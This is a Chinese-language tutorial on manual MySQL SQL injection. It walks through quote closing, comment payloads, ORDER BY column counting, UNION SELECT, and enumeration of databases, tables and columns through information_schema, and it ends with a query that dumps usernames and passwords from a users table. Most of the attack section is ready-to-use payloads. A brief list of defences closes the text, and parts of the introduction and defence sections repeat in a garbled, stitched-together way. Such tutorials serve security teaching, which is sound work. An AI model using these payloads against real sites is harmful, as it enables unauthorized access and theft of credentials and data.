MySQL手工注入基本流程详解<\/h1>

一、SQL注入基础概念<\/h2>
SQL注入是一种通过在用户输入中插入恶意SQL代码来攻击数据库的技术。当应用程序不正确地过滤用户输入时，攻击者可以操纵后端SQL查询，从而获取、修改或删除数据库中的数据。<\/p>

二、注入前的准备工作<\/h2>

识别注入点<\/strong>：寻找可能存在SQL注入漏洞的输入点，如URL参数、表单字段等<\/li>

判断数据库类型<\/strong>：通过错误信息或特定函数识别是否为MySQL数据库<\/li> <\/ol>
三、基本注入流程<\/h2>
1. 注释或闭合SQL语句<\/h3>
示例SQL语句<\/strong>：<\/p>
$sql=<\/span>"SELECT * FROM users WHERE id='<\/span>$id<\/span>' LIMIT 0,1"<\/span>; <\/span><\/span><\/code><\/pre>闭合方法<\/strong>：<\/p> 引号闭合：id=1' and '1'='1<\/code><\/p> SELECT<\/span> *<\/span> FROM<\/span> users WHERE<\/span> id=<\/span>'1'<\/span> and<\/span> '1'<\/span>=<\/span>'1'<\/span> LIMIT<\/span> 0<\/span>,1<\/span> <\/span><\/span><\/code><\/pre><\/li> 注释后面语句（常用方法）：<\/p> 'or 1=1--+ <\/span><\/span><\/span>"or 1=1--+ <\/span><\/span><\/span>)or 1=1--+ <\/span><\/span><\/span>'<\/span>)or<\/span> 1<\/span>=<\/span>1<\/span>--+ <\/span><\/span><\/span><\/span>") or 1=1--+ <\/span><\/span><\/span>"<\/span>))or<\/span> 1<\/span>=<\/span>1<\/span>--+ <\/span><\/span><\/span><\/code><\/pre>注释符--+<\/code>可以用#<\/code>代替（URL编码为%23<\/code>）<\/p> <\/li> <\/ul> 2. AND\/OR验证<\/h3> 通过逻辑判断确认是否存在注入漏洞：<\/p> 页面返回正常：<\/p> ?id=1' and 1=1 --+ ?id=1' or 1=2 --+ <\/code><\/pre> <\/li> 页面返回异常：<\/p> ?id=1' and 1=2 --+ ?id=1' or 1=1 --+ <\/code><\/pre> <\/li> <\/ul> 3. 查询字段数目<\/h3> 使用ORDER BY<\/code>子句通过二分法确定字段数量：<\/p> ?id=1' order by 1 --+ (正常) ?id=1' order by 10 --+ (错误) ?id=1' order by 5 --+ (错误) ?id=1' order by 3 --+ (正常) ?id=1' order by 4 --+ (错误) <\/code><\/pre> 最终确定字段数为3<\/p> 4. 联合查询(UNION SELECT)<\/h3> 构造UNION查询获取数据：<\/p> ?id=1' UNION SELECT 1,2,3 --+ <\/code><\/pre> 触发错误显示字段位置<\/strong>：<\/p> ?id=-1' UNION SELECT 1,2,3 --+ ?id=1' and 1=2 UNION SELECT 1,2,3 --+ ?id=1' or 1=1 UNION SELECT 1,2,3 --+ <\/code><\/pre> 5. 信息收集<\/h3> 常用MySQL系统函数<\/strong>：<\/p> version()<\/code> - MySQL版本<\/li> user()<\/code> - 数据库用户名<\/li> database()<\/code> - 数据库名<\/li> @@datadir<\/code> - 数据库路径<\/li> @@version_compile_os<\/code> - 操作系统版本<\/li> <\/ul> 查询示例<\/strong>：<\/p> 当前数据库名：<\/p> id=1' and 1=2 UNION SELECT 1,database(),3 --+ <\/code><\/pre> <\/li> MySQL版本：<\/p> id=1' and 1=2 UNION SELECT 1,2,version() --+ <\/code><\/pre> <\/li> 数据库用户和路径：<\/p> id=1' and 1=2 UNION SELECT 1,user(),@@datadir --+ <\/code><\/pre> <\/li> <\/ul> 6. 查询数据库<\/h3> 查询当前数据库：<\/p> id=1' and 1=2 UNION SELECT 1,2,database() --+ <\/code><\/pre> <\/li> 查询所有数据库：<\/p> id=1' and 1=2 UNION SELECT 1,2,group_concat(schema_name) from information_schema.schemata --+ <\/code><\/pre> <\/li> <\/ul> 7. 查询表名<\/h3> 使用database()函数：<\/p> id=1' and 1=2 UNION SELECT 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+ <\/code><\/pre> <\/li> 使用单引号括数据库名：<\/p> id=1' and 1=2 UNION SELECT 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' --+ <\/code><\/pre> <\/li> 使用hex编码（0x7365637572697479）：<\/p> id=1' and 1=2 UNION SELECT 1,2,group_concat(table_name) from information_schema.tables where table_schema=0x7365637572697479 --+ <\/code><\/pre> <\/li> <\/ul> 8. 查询列名<\/h3> 针对特定表（如users表）查询列名：<\/p> id=1' and 1=2 UNION SELECT 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+ <\/code><\/pre> 9. 查询字段值<\/h3> 获取表中的具体数据：<\/p> id=1' and 1=2 UNION SELECT 1,2,group_concat(id,username,password) from users --+ <\/code><\/pre> 四、information_schema数据库详解<\/h2> MySQL的information_schema数据库存储了所有数据库的元数据信息：<\/p> schemata表<\/strong>：<\/p> schema_name<\/code>字段记录所有数据库名称<\/li> <\/ul> <\/li> tables表<\/strong>：<\/p> table_schema<\/code>字段记录数据库名<\/li> table_name<\/code>字段记录表名<\/li> <\/ul> <\/li> columns表<\/strong>：<\/p> table_name<\/code>字段记录表名<\/li> column_name<\/code>字段记录列名<\/li> <\/ul> <\/li> <\/ol> 五、简明注入流程总结<\/h2> order by --+<\/code> 判断字段数目<\/li> union select --+<\/code> 联合查询收集信息<\/li> 查询当前数据库： id=1' and 1=2 UNION SELECT 1,2,database() --+ <\/code><\/pre> <\/li> 查询所有数据库： id=1' and 1=2 UNION SELECT 1,2,group_concat(schema_name) from information_schema.schemata --+ <\/code><\/pre> <\/li> 查询表名： id=1' and 1=2 UNION SELECT 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+ <\/code><\/pre> <\/li> 查询列名： id=1' and 1=2 UNION SELECT 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+ <\/code><\/pre> <\/li> 查询字段值： id=1' and 1=2 UNION SELECT 1,2,group_concat(id,username,password) from users --+ <\/code><\/pre> <\/li> <\/ol> 六、防御建议<\/h2> 使用参数化查询（预处理语句）<\/li> 对用户输入进行严格的过滤和转义<\/li> 最小权限原则，数据库用户只授予必要权限<\/li> 错误信息处理，不向用户显示详细错误信息<\/li> 使用Web应用防火墙(WAF)<\/li> <\/ol>

MySQL手工注入基本流程详解<\/h1>

一、SQL注入基础概念<\/h2> SQL注入是一种通过在用户输入中插入恶意SQL代码来攻击数据库的技术。当应用程序不正确地过滤用户输入时，攻击者可以操纵后端SQL查询，从而获取、修改或删除数据库中的数据。<\/p>

三、基本注入流程<\/h2>

六、防御建议<\/h2> 使用参数化查询（预处理语句）<\/li> 对用户输入进行严格的过滤和转义<\/li> 最小权限原则，数据库用户只授予必要权限<\/li> 错误信息处理，不向用户显示详细错误信息<\/li> 使用Web应用防火墙(WAF)<\/li> <\/ol>

一、SQL注入基础概念<\/h2>
SQL注入是一种通过在用户输入中插入恶意SQL代码来攻击数据库的技术。当应用程序不正确地过滤用户输入时，攻击者可以操纵后端SQL查询，从而获取、修改或删除数据库中的数据。<\/p>

六、防御建议<\/h2>

使用参数化查询（预处理语句）<\/li>
对用户输入进行严格的过滤和转义<\/li>
最小权限原则，数据库用户只授予必要权限<\/li>
错误信息处理，不向用户显示详细错误信息<\/li>
使用Web应用防火墙(WAF)<\/li> <\/ol>